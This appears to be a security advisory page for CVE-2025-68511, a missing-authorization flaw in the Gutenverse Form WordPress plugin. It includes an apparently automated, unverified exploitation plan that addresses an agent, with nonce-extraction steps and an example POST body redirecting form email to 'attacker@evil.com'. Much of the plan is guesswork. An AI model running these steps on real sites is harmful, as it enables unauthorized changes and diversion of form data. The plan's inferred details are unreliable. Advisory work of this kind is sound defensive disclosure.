CVE-2025-68511

Gutenverse Form <= 2.3.1 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
2.3.2
Patched in
18d
Time to patch

Description

The Gutenverse Form – Contact Form Builder, Booking, Reservation, Subscribe for Block Editor plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.3.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.3.1
PublishedDecember 20, 2025
Last updatedJanuary 6, 2026
Affected plugingutenverse-form

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-68511 (Gutenverse Form <= 2.3.1) ## 1. Vulnerability Summary The **Gutenverse Form** plugin for WordPress is vulnerable to **Missing Authorization** in versions up to and including 2.3.1. The vulnerability exists because an AJAX or REST API handler fails to pe…

Show full research plan

Exploitation Research Plan: CVE-2025-68511 (Gutenverse Form <= 2.3.1)

1. Vulnerability Summary

The Gutenverse Form plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 2.3.1. The vulnerability exists because an AJAX or REST API handler fails to perform a current_user_can() check before executing a sensitive action. This allows authenticated users with Contributor-level permissions to perform actions intended for higher-privileged users (like Administrators), such as modifying form configurations or accessing form data.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php (inferred from the "authenticated" and "Contributor" context common in Gutenberg-based plugins).
  • Vulnerable Action: Likely a wp_ajax_ action related to form management, submission export, or plugin settings.
  • Payload Parameter: Typically action, nonce, and data parameters (e.g., form_id, settings).
  • Authentication: Contributor-level user (PR:L).
  • Preconditions: The plugin must be active, and a valid nonce for the specific action must be obtainable (which is common for Contributors as they have access to the post editor where these scripts load).

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX action using add_action( 'wp_ajax_[ACTION_NAME]', ... ).
  2. Registration: This hook is likely found in includes/ or a dedicated admin/AJAX class.
  3. Execution: When a Contributor sends a POST request to admin-ajax.php with the specific action, the function is triggered.
  4. The Sink: The handler function likely validates the nonce using check_ajax_referer() or wp_verify_nonce() but omits a check for current_user_can( 'manage_options' ) or a similar capability.
  5. Impact: The function proceeds to perform a database operation (e.g., update_option, $wpdb->delete, or $wpdb->get_results).

4. Nonce Acquisition Strategy

Contributors can access the WordPress dashboard and the Block Editor. If the plugin enqueues its scripts in the editor, the nonce will be available in the localized script data.

  1. Identify the Script: Look for wp_localize_script in the plugin code, specifically searching for the string "nonce".
  2. Setup:
    • Create a post as a Contributor.
    • Add a "Gutenverse Form" block to the post.
  3. Extraction:
    • Use browser_navigate to go to the post editor for that post.
    • Use browser_eval to extract the nonce.
    • Common Variable Names (Inferred):
      • window.gutenverse_form_params?.nonce
      • window.gv_form_data?.nonce
      • window.gutenverse_admin?.ajax_nonce

5. Exploitation Strategy

The agent should perform a "Discovery" step first to find the exact action name.

Step 1: Discover Vulnerable Action

Search the plugin directory for AJAX registrations:

grep -rn "wp_ajax_" .

Filter for actions that lack current_user_can in their respective callback functions.

Step 2: Extract Nonce

Once the action is identified (e.g., gutenverse_save_form_settings), find the nonce identifier in the code and use browser_eval on the post editor page.

Step 3: Execute Unauthorized Action

Using the http_request tool, send a POST request.

Example Payload (Inferred):

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=gutenverse_save_form_settings&nonce=[EXTRACTED_NONCE]&form_id=1&settings[email_to]=attacker@evil.com
    
    (Note: The exact action and parameters must be confirmed during the Discovery step.)

6. Test Data Setup

  1. Install Plugin: Ensure gutenverse-form version 2.3.1 is installed and activated.
  2. Create Victim Content: Create at least one form using the plugin (as Admin).
  3. Create Attacker User:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password
    
  4. Create Trigger Page: Create a page/post containing a Gutenverse Form block so scripts/nonces are loaded.
    wp post create --post_type=post --post_status=publish --post_title="Form Page" --post_content='<!-- wp:gutenverse/form {"id":1} /-->' --post_author=[ATTACKER_ID]
    

7. Expected Results

  • The server responds with a 200 OK and a success indicator (e.g., {"success":true}).
  • The unauthorized action (e.g., changing a form setting or viewing data) is completed despite the user only being a Contributor.

8. Verification Steps

  1. Check Form Settings: Verify if the form configuration was modified.
    wp option get gutenverse_forms # Or check specific post_meta for the form
    
  2. Check Database: If the action involved data extraction or deletion, check the relevant table (likely wp_gv_forms or similar).

9. Alternative Approaches

  • REST API: If no AJAX actions are vulnerable, check for REST routes registered with register_rest_route where the permission_callback is set to __return_true or only checks is_user_logged_in.
  • Export Exploitation: If the vulnerability allows unauthorized export, the request might be a GET request to an admin-post or AJAX endpoint that returns a CSV of all form submissions. Look for actions like gutenverse_export_entries.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Gutenverse Form plugin for WordPress is vulnerable to unauthorized access in versions up to and including 2.3.1 due to missing capability checks on its AJAX handlers. This allows authenticated attackers with Contributor-level permissions to perform unauthorized actions, such as modifying form settings, which should be restricted to higher-privileged users.

Exploit Outline

1. Authenticate as a Contributor-level user and access the WordPress admin dashboard. 2. Navigate to the Block Editor for any post where the Gutenverse Form block is active to retrieve a valid security nonce (typically localized in the 'gutenverse_form_params' or similar JavaScript objects enqueued by the plugin). 3. Prepare a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to a vulnerable AJAX function (such as those responsible for saving form settings or exporting data). 4. Include the extracted security nonce and the specific parameters for the unauthorized action (e.g., 'form_id' and updated 'settings'). 5. Execute the request; the server will perform the operation because the plugin fails to verify the user's capabilities (e.g., 'current_user_can') before processing the request.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.